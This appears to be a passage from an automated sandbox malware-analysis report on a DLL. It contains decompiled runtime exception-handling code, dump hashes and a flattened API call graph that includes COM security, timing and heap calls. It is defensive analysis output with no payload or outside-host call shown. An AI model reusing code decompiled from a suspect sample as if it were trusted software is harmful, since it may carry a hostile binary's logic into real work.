              				_v12 =  *(_t77 + 8) ^  *0x6dab3014;
              				E6DA8C1C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x6dab3014);
              				E6DA8D30C(_a12);
              				_t52 = _a4;
              				_t104 = _t102 - 0x1c + 0x10;
              				_t93 =  *((intOrPtr*)(_t77 + 0xc));
              				if(( *(_t52 + 4) & 0x00000066) != 0) {
              					__eflags = _t93 - 0xfffffffe;
              					if(_t93 != 0xfffffffe) {
              						_t89 = 0xfffffffe;
              						E6DA8D490(_t77, 0xfffffffe, _t96, 0x6dab3014);
              						goto L13;
              					}
              					goto L14;
              				} else {
              					_v32 = _t52;
              					_v28 = _a12;
              					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
              					if(_t93 == 0xfffffffe) {
              						L14:
              						return _v16;
              					} else {
              						do {
              							_t81 = _v12;
              							_t59 = _t93 + (_t93 + 2) * 2;
              							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
              							_t60 = _t81 + _t59 * 4;
              							_t82 =  *((intOrPtr*)(_t60 + 4));
              							_v24 = _t60;
              							if( *((intOrPtr*)(_t60 + 4)) == 0) {
              								_t83 = _v5;
              								goto L7;
              							} else {
              								_t89 = _t96;
              								_t61 = E6DA8D430(_t82, _t96);
              								_t83 = 1;
              								_v5 = 1;
              								_t111 = _t61;
              								if(_t111 < 0) {
              									_v16 = 0;
              									L13:
              									_push(_t96);
              									E6DA8C1C0(_t77, _t89, _t93, _t96, _v12);
              									goto L14;
              								} else {
              									if(_t111 > 0) {
              										_t62 = _a4;
              										__eflags =  *_t62 - 0xe06d7363;
              										if( *_t62 == 0xe06d7363) {
              											__eflags =  *0x6daa5010;
              											if(__eflags != 0) {
              												_t72 = E6DAA1D30(__eflags, 0x6daa5010);
              												_t104 = _t104 + 4;
              												__eflags = _t72;
              												if(_t72 != 0) {
              													_t98 =  *0x6daa5010; // 0x6da8a783
              													 *0x6daa415c(_a4, 1);
              													 *_t98();
              													_t96 = _v20;
              													_t104 = _t104 + 8;
              												}
              												_t62 = _a4;
              											}
              										}
              										_t90 = _t62;
              										E6DA8D470(_t62, _a8, _t62);
              										_t64 = _a8;
              										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
              										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
              											_t90 = _t93;
              											E6DA8D490(_t64, _t93, _t96, 0x6dab3014);
              											_t64 = _a8;
              										}
              										_push(_t96);
              										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
              										E6DA8C1C0(_t77, _t90, _t93, _t96, _v12);
              										_t86 =  *((intOrPtr*)(_v24 + 8));
              										E6DA8D450();
              										asm("int3");
              										__eflags = E6DA8D4A7();
              										if(__eflags != 0) {
              											_t67 = E6DA8C53A(_t86, __eflags);
              											__eflags = _t67;
              											if(_t67 != 0) {
              												return 1;
              											} else {
              												E6DA8D4E3();
              												goto L24;
              											}
              										} else {
              											L24:
              											__eflags = 0;
              											return 0;
              										}
              									} else {
              										goto L7;
              									}
              								}
              							}
              							goto L28;
              							L7:
              							_t93 = _t77;
              						} while (_t77 != 0xfffffffe);
              						if(_t83 != 0) {
              							goto L13;
              						}
              						goto L14;
              					}
              				}
              				L28:
              			}

              APIs
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6DA8C23F
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6DA8C2F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 3480331319-1018135373
              • Opcode ID: 867c7aaaa059cad63d3d36a9649f6b567ea9336ca391450b9de61086660cfb18
              • Instruction ID: 5e070fd3c8db2bb0cf7c11e0f1de4e3a3c729edf703bfb4dde4c474750511ac6
              • Opcode Fuzzy Hash: 867c7aaaa059cad63d3d36a9649f6b567ea9336ca391450b9de61086660cfb18
              • Instruction Fuzzy Hash: 5F417434908219AFCF00DFA8C880AAEBBB5BF45318F188255ED145B393D7359996CF91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E6DA8CB89(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr* _v16;
              				signed int _v20;
              				char _v24;
              				intOrPtr _v28;
              				signed int _v36;
              				void* _v40;
              				intOrPtr _v44;
              				signed int _v48;
              				intOrPtr _v56;
              				void _v60;
              				signed char* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				void* _t74;
              				void* _t75;
              				char _t76;
              				signed char _t78;
              				signed int _t80;
              				signed char* _t81;
              				signed int _t82;
              				signed int _t83;
              				intOrPtr* _t87;
              				void* _t90;
              				signed char* _t93;
              				intOrPtr* _t96;
              				signed char _t97;
              				intOrPtr _t98;
              				intOrPtr _t99;
              				intOrPtr* _t101;
              				signed int _t102;
              				signed int _t103;
              				signed char _t108;
              				signed char* _t111;
              				signed int _t112;
              				void* _t113;
              				signed char* _t116;
              				void* _t121;
              				signed int _t123;
              				void* _t130;
              				void* _t131;
              
              				_t110 = __edx;
              				_t100 = __ecx;
              				_t96 = _a4;
              				if( *_t96 == 0x80000003) {
              					return _t74;
              				} else {
              					_t75 = E6DA8C463(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
              					if( *((intOrPtr*)(_t75 + 8)) != 0) {
              						__imp__EncodePointer(0);
              						_t121 = _t75;
              						if( *((intOrPtr*)(E6DA8C463(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
              							_t87 = E6DA8A418(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
              							_t130 = _t130 + 0x1c;
              							if(_t87 != 0) {
              								L16:
              								return _t87;
              							}
              						}
              					}
              					_t76 = _a20;
              					_v24 = _t76;
              					_v20 = 0;
              					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
              						_push(_a28);
              						E6DA8A34B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
              						_t112 = _v36;
              						_t131 = _t130 + 0x18;
              						_t87 = _v40;
              						_v16 = _t87;
              						_v8 = _t112;
              						if(_t112 < _v28) {
              							_t102 = _t112 * 0x14;
              							_v12 = _t102;
              							do {
              								_t103 = 5;
              								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
              								_t131 = _t131 + 0xc;
              								if(_v60 <= _t90 && _t90 <= _v56) {
              									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
              									_t108 = _t93[4];
              									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
              										if(( *_t93 & 0x00000040) == 0) {
              											_push(0);
              											_push(1);
              											E6DA8C75F(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
              											_t112 = _v8;
              											_t131 = _t131 + 0x30;
              										}
              									}
              								}
              								_t112 = _t112 + 1;
              								_t87 = _v16;
              								_t102 = _v12 + 0x14;
              								_v8 = _t112;
              								_v12 = _t102;
              							} while (_t112 < _v28);
              						}
              						goto L16;
              					}
              					E6DA90BF9(_t96, _t100, _t110, 0, _t121);
              					asm("int3");
              					_t111 = _v68;
              					_push(_t96);
              					_push(_t121);
              					_push(0);
              					_t78 = _t111[4];
              					if(_t78 == 0) {
              						L41:
              						_t80 = 1;
              					} else {
              						_t101 = _t78 + 8;
              						if( *_t101 == 0) {
              							goto L41;
              						} else {
              							_t116 = _a4;
              							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
              								_t97 = _t116[4];
              								_t123 = 0;
              								if(_t78 == _t97) {
              									L33:
              									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
              										_t81 = _a8;
              										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
              											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
              												_t123 = 1;
              											}
              										}
              									}
              									_t80 = _t123;
              								} else {
              									_t59 = _t97 + 8; // 0x6e
              									_t82 = _t59;
              									while(1) {
              										_t98 =  *_t101;
              										if(_t98 !=  *_t82) {
              											break;
              										}
              										if(_t98 == 0) {
              											L29:
              											_t83 = _t123;
              										} else {
              											_t99 =  *((intOrPtr*)(_t101 + 1));
              											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
              												break;
              											} else {
              												_t101 = _t101 + 2;
              												_t82 = _t82 + 2;
              												if(_t99 != 0) {
              													continue;
              												} else {
              													goto L29;
              												}
              											}
              										}
              										L31:
              										if(_t83 == 0) {
              											goto L33;
              										} else {
              											_t80 = 0;
              										}
              										goto L42;
              									}
              									asm("sbb eax, eax");
              									_t83 = _t82 | 0x00000001;
              									goto L31;
              								}
              							} else {
              								goto L41;
              							}
              						}
              					}
              					L42:
              					return _t80;
              				}
              			}

              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6DA8CBAE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: fd3cd2ba3c664b29753cf7296abd684eac2416da42e7b595093f30db9aaf575e
              • Instruction ID: 70a7fcaf1686f23b957bbc165294c9ec918cab069d9ee143319d2d6021ca966d
              • Opcode Fuzzy Hash: fd3cd2ba3c664b29753cf7296abd684eac2416da42e7b595093f30db9aaf575e
              • Instruction Fuzzy Hash: AD41597590820AAFCF05CF94CD80AAE7BB5FF88304F198259FE18A7252D33599A1DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:6.1%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:4.8%
              Total number of Nodes:2000
              Total number of Limit Nodes:55
14287 743487 14281->14287 14282->14287 14301 7433b3 localeconv 14282->14301 14285 74344e strchr 14285->14287 14289 743461 14285->14289 14286 74342a strchr 14286->14285 14288 743438 14286->14288 14287->14277 14288->14285 14288->14287 14289->14287 14304 738ecb 14289->14304 14293 741a20 14291->14293 14292 741ba8 14292->14277 14293->14292 14294 741b23 _snprintf 14293->14294 14295 741b3a _snprintf 14293->14295 14294->14293 14295->14293 14298 741caf 14296->14298 14297 741cb6 14297->14268 14298->14297 14299 742edb strncpy 14298->14299 14300 741ccc 14299->14300 14300->14268 14302 7433c3 strchr 14301->14302 14303 7433d5 strchr 14301->14303 14302->14303 14303->14285 14303->14286 14305 738ef7 14304->14305 14305->14305 14306 738f17 lstrlenW 14305->14306 14307 738f2b 14306->14307 14307->14287 14307->14307 14331 738dc9 RtlAllocateHeap 14308->14331 14310 7375fb 14311 74357b 2 API calls 14310->14311 14318 73767c 14310->14318 14312 73761f 14311->14312 14332 73755a 14312->14332 14314 737634 14315 740485 lstrlenW 14314->14315 14316 737667 14315->14316 14317 738f63 memset 14316->14317 14317->14318 14318->14182 14318->14193 14320 73750f 14319->14320 14321 7398d0 2 API calls 14320->14321 14322 73752b 14321->14322 14341 738dc9 RtlAllocateHeap 14322->14341 14324 737536 14325 739fa5 2 API calls 14324->14325 14326 737550 14324->14326 14325->14326 14326->14190 14329 73fac3 14327->14329 14330 73fb09 14329->14330 14342 73fb10 14329->14342 14330->14194 14331->14310 14333 737573 14332->14333 14334 731080 2 API calls 14333->14334 14335 737580 lstrcpynA 14334->14335 14336 73759e 14335->14336 14337 738d87 2 API calls 14336->14337 14338 7375a8 14337->14338 14339 738f63 memset 14338->14339 14340 7375cd 14339->14340 14340->14314 14341->14324 14347 73f7a3 memset memset 14342->14347 14344 73fb3c 14345 73fb5f 14344->14345 14373 73f5a1 14344->14373 14345->14329 14348 739f6b 2 API calls 14347->14348 14349 73f7f5 14348->14349 14350 739f6b 2 API calls 14349->14350 14351 73f802 14350->14351 14352 739f6b 2 API 
calls 14351->14352 14353 73f80f 14352->14353 14354 739f6b 2 API calls 14353->14354 14355 73f81c 14354->14355 14356 739f6b 2 API calls 14355->14356 14357 73f829 14356->14357 14358 738f63 memset 14357->14358 14371 73f83d 14358->14371 14359 73f8ba GetLastError 14359->14371 14360 73fa0d 14361 738f63 memset 14360->14361 14367 73f887 14360->14367 14362 73fa2f 14361->14362 14364 73fa4b GetLastError 14362->14364 14362->14367 14363 73f8fb GetLastError 14363->14371 14364->14367 14365 73a1f8 GetSystemTimeAsFileTime 14365->14371 14366 73f953 GetLastError 14366->14371 14367->14344 14369 739f6b 2 API calls 14369->14371 14370 738d87 2 API calls 14370->14371 14371->14359 14371->14360 14371->14363 14371->14365 14371->14366 14371->14367 14371->14369 14371->14370 14372 73f9cd GetLastError 14371->14372 14389 73f6e9 14371->14389 14372->14371 14374 73f5be 14373->14374 14393 738dc9 RtlAllocateHeap 14374->14393 14376 73f5d3 14377 73f5dc 14376->14377 14394 738dc9 RtlAllocateHeap 14376->14394 14379 73f6af 14377->14379 14380 738ddf 2 API calls 14377->14380 14381 73f6c7 14379->14381 14382 738ddf 2 API calls 14379->14382 14380->14379 14381->14345 14382->14381 14383 73f689 GetLastError 14383->14377 14384 73f695 14383->14384 14386 73a1f8 GetSystemTimeAsFileTime 14384->14386 14385 73a1f8 GetSystemTimeAsFileTime 14387 73f5ec 14385->14387 14386->14377 14387->14377 14387->14379 14387->14383 14387->14385 14388 738e5d 3 API calls 14387->14388 14388->14387 14391 73f70b 14389->14391 14390 73f730 GetLastError 14392 73f72b 14390->14392 14391->14390 14391->14392 14392->14371 14393->14376 14394->14387 14396 741d74 14395->14396 14397 741d2e 14395->14397 14396->14207 14397->14396 14400 74246c 14397->14400 14399 741d61 14399->14207 14407 741e6f 14400->14407 14402 742483 14405 7424aa 14402->14405 14411 7425e0 14402->14411 14404 7424a1 14404->14405 14406 741e6f 8 API calls 14404->14406 14405->14399 14406->14405 14408 741e81 14407->14408 14410 741eba 14408->14410 14421 74200e 14408->14421 14410->14402 14412 
742641 14411->14412 14413 7425f7 14411->14413 14412->14404 14413->14412 14414 742667 14413->14414 14415 742613 14413->14415 14447 7423ec 14414->14447 14417 742656 14415->14417 14418 742618 14415->14418 14437 7424dd 14417->14437 14418->14412 14420 742629 memchr 14418->14420 14420->14412 14422 742028 14421->14422 14423 7420e2 14422->14423 14424 74204d 14422->14424 14425 742097 14422->14425 14423->14424 14428 74349a 14423->14428 14424->14410 14427 7420a7 _errno _strtoi64 _errno 14425->14427 14427->14424 14434 7434fe localeconv 14428->14434 14431 7434e1 _errno 14433 7434ed 14431->14433 14432 7434d2 14432->14431 14432->14433 14433->14424 14435 7434a9 _errno strtod 14434->14435 14436 74350e strchr 14434->14436 14435->14431 14435->14432 14436->14435 14438 7411b3 7 API calls 14437->14438 14439 7424e9 14438->14439 14440 741e6f 8 API calls 14439->14440 14442 74250b 14439->14442 14445 7424ff 14440->14445 14441 742528 memchr 14441->14442 14441->14445 14442->14412 14443 741e6f 8 API calls 14443->14445 14444 7425e0 17 API calls 14444->14445 14445->14441 14445->14442 14445->14443 14445->14444 14446 7412d9 strncpy 14445->14446 14446->14445 14448 7423f5 14447->14448 14449 742410 14448->14449 14450 741e6f 8 API calls 14448->14450 14449->14412 14452 742408 14450->14452 14451 7425e0 18 API calls 14451->14452 14452->14449 14452->14451 14453 741e6f 8 API calls 14452->14453 14453->14452 14455 740542 GetTickCount 14454->14455 14456 740531 __aulldiv 14454->14456 14455->14139 14456->14139 14458 7411b3 7 API calls 14457->14458 14459 73884a 14458->14459 14460 738927 strncpy 14459->14460 14461 738860 14460->14461 14462 738927 strncpy 14461->14462 14463 738874 14462->14463 14464 738927 strncpy 14463->14464 14465 738885 14464->14465 14466 738927 strncpy 14465->14466 14467 738896 14466->14467 14468 738927 strncpy 14467->14468 14469 7388ab 14468->14469 14470 738927 strncpy 14469->14470 14471 7388c0 14470->14471 14472 738927 strncpy 14471->14472 14473 7388d6 14472->14473 14474 741c34 13 API calls 
14473->14474 14475 7388de 14474->14475 14475->14144 14504 7357a0 14509 73e565 14504->14509 14507 7357b5 GetLastError 14508 7357be 14507->14508 14534 738dc9 RtlAllocateHeap 14509->14534 14511 73e57c 14512 739ab3 RtlAllocateHeap 14511->14512 14531 7357b1 14511->14531 14513 73e591 14512->14513 14513->14531 14535 73a5fe 14513->14535 14516 739f85 2 API calls 14517 73e5af 14516->14517 14518 739fe4 2 API calls 14517->14518 14519 73e5c4 14518->14519 14520 738d9a 2 API calls 14519->14520 14521 73e5cd 14520->14521 14543 73e3b5 14521->14543 14523 73e5d7 14524 73e5de 14523->14524 14550 73e3f9 14523->14550 14526 738ddf 2 API calls 14524->14526 14527 73e6b1 14526->14527 14528 738ddf 2 API calls 14527->14528 14529 73e6bc 14528->14529 14530 738ddf 2 API calls 14529->14530 14530->14531 14531->14507 14531->14508 14532 73e5ed 14532->14524 14533 73e684 lstrlenW 14532->14533 14533->14532 14534->14511 14538 73a617 14535->14538 14536 73a717 14536->14516 14537 73a692 14541 738ecb lstrlenW 14537->14541 14542 73a6ef 14537->14542 14538->14536 14538->14537 14539 738e5d 3 API calls 14538->14539 14539->14537 14540 738f63 memset 14540->14536 14541->14537 14542->14536 14542->14540 14544 739f85 2 API calls 14543->14544 14545 73e3c7 14544->14545 14546 739eab 4 API calls 14545->14546 14547 73e3d1 14546->14547 14548 738d9a 2 API calls 14547->14548 14549 73e3dc 14548->14549 14549->14523 14551 739c50 2 API calls 14550->14551 14552 73e412 CoInitializeEx 14551->14552 14553 739f85 2 API calls 14552->14553 14554 73e42d 14553->14554 14555 739f85 2 API calls 14554->14555 14556 73e43e 14555->14556 14557 738d9a 2 API calls 14556->14557 14558 73e45a 14557->14558 14559 738d9a 2 API calls 14558->14559 14560 73e470 14559->14560 14561 738ddf 2 API calls 14560->14561 14562 73e47b 14561->14562 14562->14532 14653 731295 14654 73aab0 4 API calls 14653->14654 14655 7312ac 14654->14655 14656 7312d1 14655->14656 14657 7436d5 2 API calls 14655->14657 14658 73117d 5 API calls 14656->14658 14657->14656 14659 7312fa 
14658->14659 14660 731306 14659->14660 14661 73ab83 4 API calls 14659->14661 14662 731316 14661->14662 14664 737c67 50 API calls 14662->14664 14690 7313d4 14662->14690 14663 73b305 4 API calls 14665 7313eb 14663->14665 14666 731334 14664->14666 14667 73b3f2 5 API calls 14665->14667 14668 73133d 14666->14668 14669 731371 14666->14669 14671 73ab83 4 API calls 14666->14671 14670 7313f7 14667->14670 14677 738ddf 2 API calls 14668->14677 14673 73b305 4 API calls 14669->14673 14859 737aa7 14670->14859 14674 731368 14671->14674 14676 73138d 14673->14676 14674->14669 14691 736991 14674->14691 14680 73b3f2 5 API calls 14676->14680 14677->14660 14678 73143e 14678->14668 14686 73110a 8 API calls 14678->14686 14679 73142c 14682 73110a 8 API calls 14679->14682 14683 731399 14680->14683 14684 731438 14682->14684 14842 737d0f 14683->14842 14888 7310ba 14684->14888 14686->14684 14690->14663 14896 738dc9 RtlAllocateHeap 14691->14896 14693 7369a7 14694 73aaff 4 API calls 14693->14694 14794 736ea0 14693->14794 14695 7369bc 14694->14695 14897 73fd3d 14695->14897 14700 739ab3 RtlAllocateHeap 14701 7369e0 14700->14701 14702 739ab3 RtlAllocateHeap 14701->14702 14703 7369f4 14702->14703 14704 736a19 14703->14704 14705 739ab3 RtlAllocateHeap 14703->14705 14706 739ab3 RtlAllocateHeap 14704->14706 14705->14704 14707 736a3e 14706->14707 14923 73e849 14707->14923 14713 736aac 14714 736ab3 14713->14714 14970 738dc9 RtlAllocateHeap 14713->14970 14717 73109a 2 API calls 14714->14717 14716 736ac1 14716->14714 14719 73bb95 memset 14716->14719 14718 736b02 14717->14718 14971 73b83a 14718->14971 14719->14714 14722 738d9a 2 API calls 14723 736b1c 14722->14723 14724 73109a 2 API calls 14723->14724 14725 736b28 14724->14725 14726 73b83a 5 API calls 14725->14726 14727 736b33 14726->14727 14728 738d9a 2 API calls 14727->14728 14729 736b42 14728->14729 14730 73109a 2 API calls 14729->14730 14731 736b4a 14730->14731 14732 73b83a 5 API calls 14731->14732 14733 736b55 14732->14733 14734 738d9a 2 API calls 
14733->14734 14735 736b64 14734->14735 14736 73109a 2 API calls 14735->14736 14737 736b70 14736->14737 14738 73b83a 5 API calls 14737->14738 14739 736b7b 14738->14739 14740 738d9a 2 API calls 14739->14740 14741 736b8a 14740->14741 14742 736bdc 14741->14742 14743 73109a 2 API calls 14741->14743 14744 73109a 2 API calls 14742->14744 14745 736ba3 14743->14745 14746 736bec 14744->14746 14747 739fe4 2 API calls 14745->14747 14748 73b83a 5 API calls 14746->14748 14749 736bc5 14747->14749 14750 736bf7 14748->14750 14751 738d9a 2 API calls 14749->14751 14752 738d9a 2 API calls 14750->14752 14753 736bce 14751->14753 14754 736c06 14752->14754 14756 73b83a 5 API calls 14753->14756 14755 73109a 2 API calls 14754->14755 14757 736c12 14755->14757 14756->14742 14758 73b83a 5 API calls 14757->14758 14759 736c1d 14758->14759 14760 738d9a 2 API calls 14759->14760 14761 736c2c 14760->14761 14762 73109a 2 API calls 14761->14762 14763 736c34 14762->14763 14764 73b83a 5 API calls 14763->14764 14765 736c3f 14764->14765 14766 738d9a 2 API calls 14765->14766 14767 736c4e 14766->14767 14768 73109a 2 API calls 14767->14768 14769 736c5a 14768->14769 14770 73b83a 5 API calls 14769->14770 14771 736c65 14770->14771 14772 738d9a 2 API calls 14771->14772 14773 736c74 14772->14773 14774 73109a 2 API calls 14773->14774 14775 736c80 14774->14775 14776 73b83a 5 API calls 14775->14776 14777 736c8b 14776->14777 14778 738d9a 2 API calls 14777->14778 14779 736c9a 14778->14779 14780 73109a 2 API calls 14779->14780 14781 736ca6 14780->14781 14782 73b83a 5 API calls 14781->14782 14783 736cb1 14782->14783 14784 738d9a 2 API calls 14783->14784 14785 736cc0 14784->14785 14786 73109a 2 API calls 14785->14786 14787 736ccc 14786->14787 14788 73b83a 5 API calls 14787->14788 14789 736cd7 14788->14789 14790 738d9a 2 API calls 14789->14790 14791 736ce6 14790->14791 14989 738dc9 RtlAllocateHeap 14791->14989 14793 736d0e 14793->14794 14795 739f85 2 API calls 14793->14795 14794->14669 14796 736d27 14795->14796 14797 
739f85 2 API calls 14796->14797 14798 736d32 14797->14798 14799 739f85 2 API calls 14798->14799 14800 736d43 14799->14800 14801 739f85 2 API calls 14800->14801 14802 736d52 14801->14802 14803 739f85 2 API calls 14802->14803 14804 736d61 14803->14804 14805 739f85 2 API calls 14804->14805 14843 740522 GetTickCount 14842->14843 14844 737d2f 14843->14844 15074 738146 14844->15074 15245 739905 14859->15245 14862 740522 GetTickCount 14863 737aee 14862->14863 15251 737f12 14863->15251 14865 731420 14865->14678 14865->14679 14866 737b0e 14866->14865 14867 7376f8 19 API calls 14866->14867 14868 737b3e 14867->14868 14872 737692 8 API calls 14868->14872 14887 737b45 14868->14887 14869 738ddf 2 API calls 14870 737c47 14869->14870 14871 738ddf 2 API calls 14870->14871 14873 737c52 14871->14873 14874 737b6f 14872->14874 14875 738ddf 2 API calls 14873->14875 14874->14887 15290 73793f 14874->15290 14875->14865 14877 737b9a 14877->14887 15303 73780f 14877->15303 14880 73110a 8 API calls 14881 737bda 14880->14881 14882 737be6 14881->14882 14883 738f63 memset 14881->14883 15317 7377be 14882->15317 14884 737bfb 14883->14884 14885 731d97 6 API calls 14884->14885 14885->14882 14887->14869 14889 7310c6 14888->14889 14890 7310da 14888->14890 14891 73aaff 4 API calls 14889->14891 14892 73aaff 4 API calls 14890->14892 14893 7310cd 14891->14893 14892->14893 14894 739fa5 2 API calls 14893->14894 14895 7310fd 14894->14895 14895->14668 14896->14693 14898 739fa5 2 API calls 14897->14898 14899 7369c7 14898->14899 14900 73e795 14899->14900 14901 739f85 2 API calls 14900->14901 14902 73e7aa 14901->14902 15045 73e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14902->15045 14905 738d9a 2 API calls 14906 73e7c2 14905->14906 14907 7369cc 14906->14907 14908 739f85 2 API calls 14906->14908 14907->14700 14909 73e7d6 14908->14909 14910 739f85 2 API calls 14909->14910 14911 73e7e7 14910->14911 15052 73e6d9 SysAllocString SysAllocString 14911->15052 14913 73e7f8 14914 73e826 14913->14914 14915 
739ab3 RtlAllocateHeap 14913->14915 14916 738d9a 2 API calls 14914->14916 14917 73e807 VariantClear 14915->14917 14918 73e82f 14916->14918 14917->14914 14920 738d9a 2 API calls 14918->14920 14921 73e838 14920->14921 15058 73e539 14921->15058 14924 739f85 2 API calls 14923->14924 14925 73e85b 14924->14925 14926 73e485 6 API calls 14925->14926 14927 73e865 14926->14927 14928 738d9a 2 API calls 14927->14928 14929 73e873 14928->14929 14930 739f85 2 API calls 14929->14930 14945 736a80 14929->14945 14931 73e887 14930->14931 14932 739f85 2 API calls 14931->14932 14933 73e898 14932->14933 14934 73e6d9 10 API calls 14933->14934 14935 73e8a9 14934->14935 14936 73e8d7 14935->14936 14937 739ab3 RtlAllocateHeap 14935->14937 14938 738d9a 2 API calls 14936->14938 14940 73e8b8 VariantClear 14937->14940 14939 73e8e0 14938->14939 14942 738d9a 2 API calls 14939->14942 14940->14936 14943 73e8e9 14942->14943 14944 73e539 2 API calls 14943->14944 14944->14945 14946 73e8fa 14945->14946 14947 739f85 2 API calls 14946->14947 14948 73e90f 14947->14948 14949 73e485 6 API calls 14948->14949 14950 73e919 14949->14950 14951 738d9a 2 API calls 14950->14951 14952 73e927 14951->14952 14953 739f85 2 API calls 14952->14953 14968 736a88 14952->14968 14954 73e93b 14953->14954 14955 739f85 2 API calls 14954->14955 14956 73e94c 14955->14956 14957 73e6d9 10 API calls 14956->14957 14958 73e95d 14957->14958 14959 73e98b 14958->14959 14960 739ab3 RtlAllocateHeap 14958->14960 14961 738d9a 2 API calls 14959->14961 14964 73e96c VariantClear 14960->14964 14962 73e994 14961->14962 14963 738d9a 2 API calls 14962->14963 14966 73e99d 14963->14966 14964->14959 14967 73e539 2 API calls 14966->14967 14967->14968 14969 738dc9 RtlAllocateHeap 14968->14969 14969->14713 14970->14716 14972 738f63 memset 14971->14972 14973 73b87e 14972->14973 14974 738f63 memset 14973->14974 14975 73b88a 14974->14975 14983 73b9e2 14975->14983 14988 736b0d 14975->14988 15063 738dc9 RtlAllocateHeap 14975->15063 14976 738ddf 2 API calls 
14976->14988 14978 739a76 RtlAllocateHeap 14980 73b8f9 14978->14980 14979 739bfd 2 API calls 14979->14980 14980->14978 14980->14979 14981 738ddf 2 API calls 14980->14981 14982 73b9a8 14980->14982 14980->14983 14980->14988 14981->14980 14982->14983 14984 739b26 2 API calls 14982->14984 14983->14976 14985 73b9cb 14984->14985 14985->14983 14986 73b9d1 14985->14986 14987 738ddf 2 API calls 14986->14987 14987->14988 14988->14722 14989->14793 15046 73e4ca SysAllocString 15045->15046 15051 73e507 15045->15051 15047 73e4e5 15046->15047 15048 73e4e9 CoSetProxyBlanket 15047->15048 15047->15051 15049 73e500 15048->15049 15048->15051 15062 738dc9 RtlAllocateHeap 15049->15062 15051->14905 15053 739f85 2 API calls 15052->15053 15054 73e704 SysAllocString 15053->15054 15055 738d9a 2 API calls 15054->15055 15057 73e717 SysFreeString SysFreeString SysFreeString 15055->15057 15057->14913 15059 73e544 15058->15059 15060 738ddf 2 API calls 15059->15060 15061 73e561 15060->15061 15061->14907 15062->15051 15063->14980 15075 7411b3 7 API calls 15074->15075 15076 738156 15075->15076 15077 738927 strncpy 15076->15077 15078 73816f 15077->15078 15079 738927 strncpy 15078->15079 15080 738183 15079->15080 15081 738927 strncpy 15080->15081 15082 738194 15081->15082 15083 738927 strncpy 15082->15083 15084 7381a7 15083->15084 15085 738927 strncpy 15084->15085 15086 7381bd 15085->15086 15087 738927 strncpy 15086->15087 15088 7381d1 15087->15088 15089 738927 strncpy 15088->15089 15090 7381ea 15089->15090 15091 738927 strncpy 15090->15091 15092 7381fe 15091->15092 15093 738927 strncpy 15092->15093 15094 738212 15093->15094 15095 738927 strncpy 15094->15095 15096 738226 15095->15096 15097 738927 strncpy 15096->15097 15098 73823c 15097->15098 15099 738927 strncpy 15098->15099 15100 738253 15099->15100 